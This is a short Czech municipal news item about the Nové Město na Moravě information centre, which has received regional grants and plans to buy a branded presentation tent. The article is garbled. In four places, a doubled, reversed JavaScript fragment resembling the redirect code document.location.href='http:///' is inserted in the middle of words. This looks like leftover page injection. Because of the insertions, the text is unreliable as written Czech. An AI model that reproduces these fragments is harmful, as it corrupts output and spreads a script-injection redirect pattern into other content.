Rainbow page separator

Infocentrum hodlá požádat o krajskou dotaci na stan

Středa, 27. ledna 2016

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Celkem 52 916 korun v rámci krajských dotací získalo v uplynulých dvou letech novoměstské informační centrum.
Za finanční podporu ve výši 22 916 korun byly v roce 2014 vyrobeny letáky propagující stezky pro pěší v Ochoze a zakoupeny oboustranné reklamní s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojany. Loni novoměstské informační centrum získalo třicet tisíc korun na tisk letáků o umělcích Novoměstska, sgrafitech Karla Němce na kostele svaté Kunhuty a na zakoupení dvou židlí do infocentra.
O krajské dotace se v infocentru hodlají zajímat i v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce. Chtěli by podpořit nákup nového prezentačního stanu pro kulturní a spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní akce, včetně těch konaných ve Vysočina Areně. Cena stanu včetně jeho grafického potisku s motivy biatlonistů a cyklistů by neměla přesáhnout třiačtyřicet tisíc korun.